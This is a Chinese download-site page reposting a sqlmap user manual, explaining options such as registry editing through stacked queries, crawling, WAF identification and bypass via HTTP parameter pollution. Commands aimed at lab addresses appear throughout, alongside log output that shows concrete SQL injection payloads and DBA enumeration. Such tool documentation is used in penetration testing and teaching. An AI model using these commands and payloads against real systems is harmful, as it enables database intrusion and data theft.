HI,欢迎您光临本站,秉承服务宗旨,销售只是起点,服务永无止境!
    • 短视频文案
      • 励志哲理
      • 名言美句
      • 情感语录
      • 回复热评
      • 解说文案
    • 短视频素材
      • 情感励志
      • 美食小吃
      • 体育运动
      • 生活人文
      • 妙招好物
      • 风景风光
      • 影音娱乐
      • 颜值时尚
      • 游戏动漫
      • 自然景观
    • 短视频课程
      • 同城课程
      • 带货课程
      • 投放课程
      • 玩法课程
    • 中视频素材
    • 短视频工具
    • 副业项目
资源分享吧
  • 首页
  • CMS模板host
    • DEDECMS模板965
    • 易优CMS318
    • WordPress模板146
    • Discuz模板101
    • 帝国CMS102
    • 苹果cms78
    • Pbootcms24
    • zblog模板2
  • 整站源码
    • 教育/交友/直播76
    • 商城/淘宝/网店26
    • 门户/论坛/信息27
    • 小说/新闻/博客76
    • 电影/视频/音乐22
    • 图片/素材/下载49
    • 支付/金融/货币356
    • 导航/目录/友链25
    • 会员/推广/任务57
    • 公众号/小程序/游戏133
  • 一元夺宝new
    E启学在线网校网站在线教育校园教学平台程序系统V1.0源码
    E启学在线网校网站在线教育校园教学平台程序系统V1.0源码
    Laravel开发MeEdu在线点播网站源码 知识付费应用系统源码
    Laravel开发MeEdu在线点播网站源码 知识付费应用系统源码
    一比一精仿电影挖片网苹果cmsv10模板
    一比一精仿电影挖片网苹果cmsv10模板
    织梦高仿dede58织梦模板下载站完整无错整站版源码 1.69GB打包
    织梦高仿dede58织梦模板下载站完整无错整站版源码 1.69GB打包
    蓝色清晰织梦资源网下载站源码
    蓝色清晰织梦资源网下载站源码
    全景通旗舰版最新源码 内核到krpano1.19pr8 支持任何高清图
    全景通旗舰版最新源码 内核到krpano1.19pr8 支持任何高清图
    thinkPHP音视频素材资源下载站整站源码 带会员系统+支付接口
    thinkPHP音视频素材资源下载站整站源码 带会员系统+支付接口
    仿集图网模板图片素材类模板织梦下载站源码带整站数据
    仿集图网模板图片素材类模板织梦下载站源码带整站数据
    织梦蓝色图纸展示类企业网站源码
    织梦蓝色图纸展示类企业网站源码
    Thinkphp5.0响应式进销存仓库管理系统源码
    Thinkphp5.0响应式进销存仓库管理系统源码
    prev
    next
  • 网页素材
    • 网页游戏148
    • 网页模板4723
    • 特效代码5467
  • 办公素材
    • PPT模板377
    • 简历模板0
  • 站长学院
    • DEDE教程352
    • wordpress教程416
    • SEO教程124
    • 其它文档教程13
  • 更多
    • 办公教程4
    • 群辉教程12
    • 电脑基础7124
    • GPS导航
    • 安卓系统15
      • Android资讯2
      • ROM0
      • 教程工具0
    • Win系统169
      • Windows XP3
      • Windows 77
      • Windows 80
      • Windows 1012
      • 服务器系统1129
      • Win主题12
      • Win教程26
      • Win资讯0
      • Win软件98
    • 站点标签
    • 更新日志
    • 其他10
登录/注册
  • 精品会员专享
  • 会员折扣下载
  • 每日海量更新
立即开通 开通会员抄底价
当前位置:资源分享吧 > sqlmap用户手册[续篇]
也想出现在这里? 联系我们吧

sqlmap用户手册[续篇]

作者 : 小编 本文共14071个字,预计阅读时间需要36分钟 发布时间: 2021-06-5 共4.04K人阅读
也想出现在这里? 联系我们吧

ps:其实看到zone里很多问sqlmap的问题在通读看完那篇文章后都能解决。可惜啊,现在的人通读看文章的耐心都没有了,遇到了哪个问题就想起针对这个问题求助,却不知道仔细看完之后,以后可以省多少时间来求助,吐槽完毕,正文开始:

对Windows注册表操作当数据库为MySQL,PostgreSQL或Microsoft SQL Server,并且当前web应用支持堆查询。 当然,当前连接数据库的用户也需要有权限操作注册表。

读取注册表值

参数:-reg-read

写入注册表值

参数:-reg-add

删除注册表值

参数:-reg-del

注册表辅助选项

参数:-reg-key,-reg-value,-reg-data,-reg-type

需要配合之前三个参数使用,例子:

$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 –reg-add –reg-key="HKEY_LOCAL_MACHINESOFTWAREsqlmap" –reg-value=Test –reg-type=REG_SZ –reg-data=1常规参数从sqlite中读取session

参数:-s

sqlmap对每一个目标都会在output路径下自动生成一个SQLite文件,如果用户想指定读取的文件路径,就可以用这个参数。

保存HTTP(S)日志

参数:-t

这个参数需要跟一个文本文件,sqlmap会把HTTP(S)请求与响应的日志保存到那里。

非交互模式

参数:-batch

用此参数,不需要用户输入,将会使用sqlmap提示的默认值一直运行下去。

强制使用字符编码

参数:-charset

不使用sqlmap自动识别的(如HTTP头中的Content-Type)字符编码,强制指定字符编码如:

–charset=GBK爬行网站URL

参数:-crawl

sqlmap可以收集潜在的可能存在漏洞的连接,后面跟的参数是爬行的深度。

例子:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/" –batch –crawl=3[…][xx:xx:53] [INFO] starting crawler[xx:xx:53] [INFO] searching for links with depth 1[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while[xx:xx:53] [INFO] searching for links with depth 2[xx:xx:54] [INFO] heuristics detected web page charset \’ascii\'[xx:xx:00] [INFO] 42/56 links visited (75%)[…]

规定输出到CSV中的分隔符

参数:-csv-del

当dump保存为CSV格式时(-dump-format=CSV),需要一个分隔符默认是逗号,用户也可以改为别的 如:

–csv-del=";"DBMS身份验证

参数:-dbms-cred

某些时候当前用户的权限不够,做某些操作会失败,如果知道高权限用户的密码,可以使用此参数,有的数据库有专门的运行机制,可以切换用户如Microsoft SQL Server的OPENROWSET函数

定义dump数据的格式

参数:-dump-format

输出的格式可定义为:CSV,HTML,SQLITE

预估完成时间

参数:-eta

可以计算注入数据的剩余时间。

例如Oracle的布尔型盲注:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1" -b –eta

[…][hh:mm:01] [INFO] the back-end DBMS is Oracle[hh:mm:01] [INFO] fetching banner[hh:mm:01] [INFO] retrieving the length of query output[hh:mm:01] [INFO] retrieved: 6417% [========> ] 11/64 ETA 00:19

然后:

100% [===================================================] 64/64[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 – Prod

web application technology: PHP 5.2.6, Apache 2.2.9back-end DBMS: Oraclebanner: \’Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 – Prod\’sqlmap先输出长度,预计完成时间,显示百分比,输出字符

刷新session文件

参数:-flush-session

如果不想用之前缓存这个目标的session文件,可以使用这个参数。 会清空之前的session,重新测试该目标。

自动获取form表单测试

参数:-forms

如果你想对一个页面的form表单中的参数测试,可以使用-r参数读取请求文件,或者通过-data参数测试。 但是当使用-forms参数时,sqlmap会自动从-u中的url获取页面中的表单进行测试。

忽略在会话文件中存储的查询结果

参数:-fresh-queries

忽略session文件保存的查询,重新查询。

使用DBMS的hex函数

参数:-hex

有时候字符编码的问题,可能导致数据丢失,可以使用hex函数来避免:

针对PostgreSQL例子:

$ python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" –banner –hex -v 3 –parse-errors

[…][xx:xx:14] [INFO] fetching banner[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)[xx:xx:15] [INFO] parsed error message: \’pg_query() [<a href=\’function.pg-query\’>function.pg-query</a>]: Query failed: ERROR: invalid input syntax for type numeric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/pgsql.inc.php</b> on line <b>35</b>\'[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled byGCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2[…]自定义输出的路径

参数:-output-dir

sqlmap默认把session文件跟结果文件保存在output文件夹下,用此参数可自定义输出路径 例如:-output-dir=/tmp

从响应中获取DBMS的错误信息

参数:-parse-errors

有时目标没有关闭DBMS的报错,当数据库语句错误时,会输出错误语句,用词参数可以会显出错误信息。

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" –parse-errors[…][11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test[11:12:17] [INFO] parsed error message: \’Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list.<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>\'[11:12:17] [INFO] parsed error message: \’Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list.<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>\'[11:12:17] [INFO] parsed error message: \’Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>\'[11:12:17] [INFO] target URL appears to have 3 columns in query[…]其他的一些参数使用参数缩写

参数:-z

有使用参数太长太复杂,可以使用缩写模式。 例如:

python sqlmap.py –batch –random-agent –ignore-proxy –technique=BEU -u "www.target.com/vuln.php?id=1"可以写成:

python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"还有:

python sqlmap.py –ignore-proxy –flush-session –technique=U –dump -D testdb -T users -u "www.target.com/vuln.php?id=1"可以写成:

python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"成功SQL注入时警告

参数:-alert

设定会发的答案

参数:-answers

当希望sqlmap提出输入时,自动输入自己想要的答案可以使用此参数: 例子:

$ python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1"–technique=E –answers="extending=N" –batch[…][xx:xx:56] [INFO] testing for SQL injection on GET parameter \’id\’heuristic (parsing) test showed that the back-end DBMS could be \’MySQL\’. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y[xx:xx:56] [INFO] do you want to include all tests for \’MySQL\’ extending provided level (1) and risk (1)? [Y/n] N[…]发现SQL注入时发出蜂鸣声

参数:-beep

发现sql注入时,发出蜂鸣声。

启发式检测WAF/IPS/IDS保护

参数:-check-waf

WAF/IPS/IDS保护可能会对sqlmap造成很大的困扰,如果怀疑目标有此防护的话,可以使用此参数来测试。 sqlmap将会使用一个不存在的参数来注入测试

例如:

&foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1如果有保护的话可能返回结果会不同。

清理sqlmap的UDF(s)和表

参数:-cleanup

清除sqlmap注入时产生的udf与表。

禁用彩色输出

参数:-desable-coloring

sqlmap默认彩色输出,可以使用此参数,禁掉彩色输出。

使用指定的Google结果页面

参数:-gpage

默认sqlmap使用前100个URL地址作为注入测试,结合此选项,可以指定页面的URL测试。

使用HTTP参数污染

参数:-hpp

HTTP参数污染可能会绕过WAF/IPS/IDS保护机制,这个对ASP/IIS与ASP.NET/IIS平台很有效。

测试WAF/IPS/IDS保护

参数:-identify-waf

sqlmap可以尝试找出WAF/IPS/IDS保护,方便用户做出绕过方式。目前大约支持30种产品的识别。

例如对一个受到ModSecurity WAF保护的MySQL例子:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" –identify-waf -v 3[…][xx:xx:23] [INFO] testing connection to the target URL[xx:xx:23] [INFO] heuristics detected web page charset \’ascii\'[xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \’USP Secure Entry Server (United Security Providers)\'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \’BinarySEC Web Application Firewall (BinarySEC)\'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \’NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)\'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \’Hyperguard Web Application Firewall (art of defence Inc.)\'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \’Cisco ACE XML Gateway (Cisco Systems)\'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \’TrafficShield (F5 Networks)\'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \’Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)\'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \’KONA Security Solutions (Akamai Technologies)\'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \’Incapsula Web Application Firewall (Incapsula/Imperva)\'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \’CloudFlare Web Application Firewall (CloudFlare)\'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \’Barracuda Web Application Firewall (Barracuda Networks)\'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \’webApp.secure (webScurity)\'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \’Proventia Web Application Security (IBM)\'[xx:xx:23] [DEBUG] declared web page charset \’iso-8859-1\'[xx:xx:23] [DEBUG] page not found (404)[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \’KS-WAF (Knownsec)\'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \’NetScaler (Citrix Systems)\'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \’Jiasule Web Application Firewall (Jiasule)\'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \’WebKnight Application Firewall (AQTRONIX)\'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \’AppWall (Radware)\'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \’ModSecurity: Open Source Web Application Firewall (Trustwave)\'[xx:xx:23] [CRITICAL] WAF/IDS/IPS identified \’ModSecurity: Open Source Web Application Firewall (Trustwave)\’. Please consider usage of tamper scripts (option \’–tamper\’)[…]模仿智能手机

参数:-mobile

有时服务端只接收移动端的访问,此时可以设定一个手机的User-Agent来模仿手机登陆。

例如:

$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" –mobile[…]which smartphone do you want sqlmap to imitate through HTTP User-Agent header?[1] Apple iPhone 4s (default)[2] BlackBerry 9900[3] Google Nexus 7[4] HP iPAQ 6365[5] HTC Sensation[6] Nokia N97[7] Samsung Galaxy S> 1[…]安全的删除output目录的文件

参数:-purge-output

有时需要删除结果文件,而不被恢复,可以使用此参数,原有文件将会被随机的一些文件覆盖。

例如:

$ python sqlmap.py –purge-output -v 3[…][xx:xx:55] [INFO] purging content of directory \’/home/user/sqlmap/output\’…[xx:xx:55] [DEBUG] changing file attributes[xx:xx:55] [DEBUG] writing random data to files[xx:xx:55] [DEBUG] truncating files[xx:xx:55] [DEBUG] renaming filenames to random values[xx:xx:55] [DEBUG] renaming directory names to random values[xx:xx:55] [DEBUG] deleting the whole directory tree[…]启发式判断注入

参数:-smart

有时对目标非常多的URL进行测试,为节省时间,只对能够快速判断为注入的报错点进行注入,可以使用此参数。

例子:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" –batch –smart[…][xx:xx:14] [INFO] testing if GET parameter \’ca\’ is dynamic[xx:xx:14] [WARNING] GET parameter \’ca\’ does not appear dynamic[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter \’ca\’ might not be injectable[xx:xx:14] [INFO] skipping GET parameter \’ca\'[xx:xx:14] [INFO] testing if GET parameter \’user\’ is dynamic[xx:xx:14] [WARNING] GET parameter \’user\’ does not appear dynamic[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter \’user\’ might not be injectable[xx:xx:14] [INFO] skipping GET parameter \’user\'[xx:xx:14] [INFO] testing if GET parameter \’id\’ is dynamic[xx:xx:14] [INFO] confirming that GET parameter \’id\’ is dynamic[xx:xx:14] [INFO] GET parameter \’id\’ is dynamic[xx:xx:14] [WARNING] reflective value(s) found and filtering out[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter \’id\’ might be injectable (possible DBMS: \’MySQL\’)[xx:xx:14] [INFO] testing for SQL injection on GET parameter \’id\’heuristic (parsing) test showed that the back-end DBMS could be \’MySQL\’. Do you want to skip test payloads specific for other DBMSes? [Y/n] Ydo you want to include all tests for \’MySQL\’ extending provided level (1) and risk (1)? [Y/n] Y[xx:xx:14] [INFO] testing \’AND boolean-based blind – WHERE or HAVING clause\'[xx:xx:14] [INFO] GET parameter \’id\’ is \’AND boolean-based blind – WHERE or HAVING clause\’ injectable [xx:xx:14] [INFO] testing \’MySQL >= 5.0 AND error-based – WHERE or HAVING clause\'[xx:xx:14] [INFO] GET parameter \’id\’ is \’MySQL >= 5.0 AND error-based – WHERE or HAVING clause\’ injectable [xx:xx:14] [INFO] testing \’MySQL inline queries\'[xx:xx:14] [INFO] testing \’MySQL > 5.0.11 stacked queries\'[xx:xx:14] [INFO] testing \’MySQL < 5.0.12 stacked queries (heavy query)\'[xx:xx:14] [INFO] testing \’MySQL > 5.0.11 AND time-based blind\'[xx:xx:24] [INFO] GET parameter \’id\’ is \’MySQL > 5.0.11 AND time-based blind\’ injectable [xx:xx:24] [INFO] testing \’MySQL UNION query (NULL) – 1 to 20 columns\'[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test[xx:xx:24] [INFO] target URL appears to have 3 columns in query[xx:xx:24] [INFO] GET parameter \’id\’ is \’MySQL UNION query (NULL) – 1 to 20 columns\’ injectable[…]初级用户向导参数

参数:-wizard 面向初级用户的参数,可以一步一步教你如何输入针对目标注入。

$ python sqlmap.py –wizard

sqlmap/1.0-dev-2defc30 – automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user\’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:25:26

Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1POST data (–data) [Enter for None]: Injection difficulty (–level/–risk). Please choose:[1] Normal (default)[2] Medium[3] Hard> 1Enumeration (–banner/–current-user/etc). Please choose:[1] Basic (default)[2] Smart[3] All> 1

sqlmap is running, please wait..

heuristic (parsing) test showed that the back-end DBMS could be \’Microsoft SQL Server\’. Do you want to skip test payloads specific for other DBMSes? [Y/n] Ydo you want to include all tests for \’Microsoft SQL Server\’ extending provided level (1) and risk (1)? [Y/n] YGET parameter \’id\’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] Nsqlmap identified the following injection points with a total of 25 HTTP(s) requests:—Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind – WHERE or HAVING clause Payload: id=1 AND 2986=2986

Type: error-based Title: Microsoft SQL Server/Sybase AND error-based – WHERE or HAVING clause Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)))

Type: UNION query Title: Generic UNION query (NULL) – 3 columns Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) CHAR(70) CHAR(79) CHAR(118) CHAR(106) CHAR(87) CHAR(101) CHAR(119) CHAR(115) CHAR(114) CHAR(77) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)–

Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=1; WAITFOR DELAY \’0:0:5\’–

Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=1 WAITFOR DELAY \’0:0:5\’–

Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: id=(SELECT CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58))—web server operating system: Windows XPweb application technology: ASP, Microsoft IIS 5.1back-end DBMS operating system: Windows XP Service Pack 2back-end DBMS: Microsoft SQL Server 2005banner:—Microsoft SQL Server 2005 – 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)—current user: \’sa\’current database: \’testdb\’current user is DBA: True

[*] shutting down at 11:25:52link:http://drops.wooyun.org/tips/401

参数 可以使用 注入
1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » sqlmap用户手册[续篇]

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html
小编

小编 VIP

分享到:
上一篇
SQL通用防注入系统asp版漏洞
下一篇
黑客专家教你设计不易破解的密码以及注意事项

发表评论 取消回复

要发表评论,您必须先登录。

最新文章
餐饮火锅加盟网站pbootcms模板源码
餐饮火锅加盟网站pbootcms模板源码
源码下载新闻资讯博客网站pbootcms模板
源码下载新闻资讯博客网站pbootcms模板
绿色人造草坪地坪施工网站源码pbootcms模板
绿色人造草坪地坪施工网站源码pbootcms模板
红色火锅加盟网站pbootcms模板源码
红色火锅加盟网站pbootcms模板源码
蓝色源码钢结构工程基建网站pbootcms模板
蓝色源码钢结构工程基建网站pbootcms模板
标签云
DEDECMS (483) dedecms教程 (326) eyoucms (270) html (364) html5 (1717) html模板 (733) Linux (1245) linux教程 (1245) wordpress教程 (380) 下载 (277) 代码 (816) 企业网站模板 (874) 企业网站模板下载 (874) 免费企业网站模板 (874) 入侵防御 (270) 公司网站模板 (874) 切换 (502) 动画 (594) 国内网站模板 (324) 图片 (582) 技术网络漏洞 (347) 插件 (447) 效果 (765) 源码 (381) 漏洞 (371) 漏洞分析 (347) 特效 (789) 电脑使用 (4064) 电脑操作 (4064) 短视频素材 (606) 笔记本电脑价格 (4037) 笔记本电脑品牌排行 (4037) 笔记本电脑知识 (4037) 笔记本电脑评测 (4037) 素材 (483) 织梦 (407) 织梦教程 (342) 网站模板 (436) 网站源码 (417) 网站漏洞检测 (347) 网络安全WEB漏洞 (347) 菜单 (299) 视频 (376) 这是 (345) 鼠标 (417)

限时优惠

【阿里云】云产品采购季,助力行业复工。新用户专享1折起,云服务器低至0.75折,更多产品可叠加专属代金券下单
立即查看

相关推荐

jQuery交互式日期选择代码
小编小编

jQuery交互式日期选择代码

  • 3.21K
  • 免费
  • 下载
响应式抖音课程培训资讯类网站织梦模板(自适应手机端)
小编小编

响应式抖音课程培训资讯类网站织梦模板(自适应手机端)

模板名称: 响应式抖音课程培训资讯类网站织梦模板(自适应手机端)+利于SEO优化 模板介绍: 织梦最新内核开发的模板,该模板属于HTML5响应式、抖音教程、抖音培训类企业使用,一款适用性很强的模板,基本可以适合各行业的企业网站! 响应式自适应各种移动设...
  • 1.52K
  • 终身VIP免费
  • 下载
基于Http Header的SQL注入的方法详解
小编小编

基于Http Header的SQL注入的方法详解

通常HTTP消息包括客户机向服务器的请求消息和服务器向客户机的响应消息。这两种类型的消息由一个起始行,一个或者多个头域,一个只是头域结束的空行和可选的消息体组成。HTTP的头域包括通用头,请求头,响应头和实体头四个部分。每个头域由一个域名,冒号(:)和...
  • 717
  • 免费
  • 下载
新浪生活服务互动社区Mysql盲注漏洞的介绍及其修复方法(图解)
小编小编

新浪生活服务互动社区Mysql盲注漏洞的介绍及其修复方法(图解)

注入漏洞存在地址为http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310其中该漏洞可以导致数据泄漏,其中泄漏的数据包括团购,优惠券、以及用户联系方式,smslog,团购商户、admin等数据。同...
  • 5.19K
  • 免费
  • 下载
  • 3073本站运营(天)
  • 62850用户总数
  • 26548资源数(个)
  • 2近7天更新(个)
  • 82301资源大小(GB)
加入VIP获取全站资源

「资源分享吧」 ZYFX8.CN

国内极具人气的网络源码资源交流学习平台
下载源码文章,学软件教程,找灵感素材,尽在「资源分享吧」

按Ctrl+D收藏本站

找资源就上「 资源分享吧 」

WWW.ZYFX8.CN

资源分享吧

资源分享吧(www.zyfx8.cn)是一家专门做精品素材的网站,网站以网站源码、网站模板、网页特效为主要内容,以“共享创造价值”为理念,以“尊重原创”为准则。

本站导航
  • 热门标签
  • 网站专题
  • 站点地图
更多导航
  • 申请友链
  • 用户协议
  • 免责声明
快速搜索
    友情链接 自助申请友链
  • RiTheme主题
  • wordpress主题
  • 在线PS修图
  • 源码下载
  • 网站模板
  • 资源分享吧
Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
资源分享吧(www.zyfx8.cn)是一家专门做精品素材的网站,以“共享创造价值”为理念,以“尊重原创”为准则。
  • 会员特惠
  • 签到
  • 客服

    在线客服

    点我联系

    直接说出您的需求!
    切记!带上资源链接与问题!

    工作时间: 9:30-21:30

  • 更新
    日历
  • 全屏
  • 首页

  • 签到

  • 切换

  • 客服

资源分享吧
  • 登录
  • 注册
or
or
忘记密码?
资源分享吧
  • 首页
  • CMS模板host ►
    • DEDECMS模板965
    • 易优CMS318
    • WordPress模板146
    • Discuz模板101
    • 帝国CMS102
    • 苹果cms78
    • Pbootcms24
    • zblog模板2
  • 整站源码 ►
    • 教育/交友/直播76
    • 商城/淘宝/网店26
    • 门户/论坛/信息27
    • 小说/新闻/博客76
    • 电影/视频/音乐22
    • 图片/素材/下载49
    • 支付/金融/货币356
    • 导航/目录/友链25
    • 会员/推广/任务57
    • 公众号/小程序/游戏133
  • 一元夺宝new
    E启学在线网校网站在线教育校园教学平台程序系统V1.0源码
    E启学在线网校网站在线教育校园教学平台程序系统V1.0源码
    Laravel开发MeEdu在线点播网站源码 知识付费应用系统源码
    Laravel开发MeEdu在线点播网站源码 知识付费应用系统源码
    一比一精仿电影挖片网苹果cmsv10模板
    一比一精仿电影挖片网苹果cmsv10模板
    织梦高仿dede58织梦模板下载站完整无错整站版源码 1.69GB打包
    织梦高仿dede58织梦模板下载站完整无错整站版源码 1.69GB打包
    蓝色清晰织梦资源网下载站源码
    蓝色清晰织梦资源网下载站源码
    全景通旗舰版最新源码 内核到krpano1.19pr8 支持任何高清图
    全景通旗舰版最新源码 内核到krpano1.19pr8 支持任何高清图
    thinkPHP音视频素材资源下载站整站源码 带会员系统+支付接口
    thinkPHP音视频素材资源下载站整站源码 带会员系统+支付接口
    仿集图网模板图片素材类模板织梦下载站源码带整站数据
    仿集图网模板图片素材类模板织梦下载站源码带整站数据
    织梦蓝色图纸展示类企业网站源码
    织梦蓝色图纸展示类企业网站源码
    Thinkphp5.0响应式进销存仓库管理系统源码
    Thinkphp5.0响应式进销存仓库管理系统源码
    prev
    next
  • 网页素材 ►
    • 网页游戏148
    • 网页模板4723
    • 特效代码5467
  • 办公素材 ►
    • PPT模板377
    • 简历模板0
  • 站长学院 ►
    • DEDE教程352
    • wordpress教程416
    • SEO教程124
    • 其它文档教程13
  • 更多 ►
    • 办公教程4
    • 群辉教程12
    • 电脑基础7124
    • GPS导航
    • 安卓系统15 ►
      • Android资讯2
      • ROM0
      • 教程工具0
    • Win系统169 ►
      • Windows XP3
      • Windows 77
      • Windows 80
      • Windows 1012
      • 服务器系统1129
      • Win主题12
      • Win教程26
      • Win资讯0
      • Win软件98
    • 站点标签
    • 更新日志
    • 其他10
文章展示
交易所源码搭建教程java多语言部署
交易所源码搭建教程java多语言部署
餐饮火锅加盟网站pbootcms模板源码
餐饮火锅加盟网站pbootcms模板源码
源码下载新闻资讯博客网站pbootcms模板
源码下载新闻资讯博客网站pbootcms模板
绿色人造草坪地坪施工网站源码pbootcms模板
绿色人造草坪地坪施工网站源码pbootcms模板
红色火锅加盟网站pbootcms模板源码
红色火锅加盟网站pbootcms模板源码
蓝色源码钢结构工程基建网站pbootcms模板
蓝色源码钢结构工程基建网站pbootcms模板
开通VIP 享更多特权,建议使用QQ登录
账号登录/注册
QQ登录
微博登录
×

    回馈用户限时特惠

    「 资源分享吧 」国内极具人气的网络资源交流学习平台,海量资源每天更新,优质资源畅快下载

    终身SVIP原价 590元,国庆限时活动价仅需 “ 59元 ”,终身免费~~机不可失~~


    立即开通永久会员>>

    ld** 刚刚下载了 Ripro子主题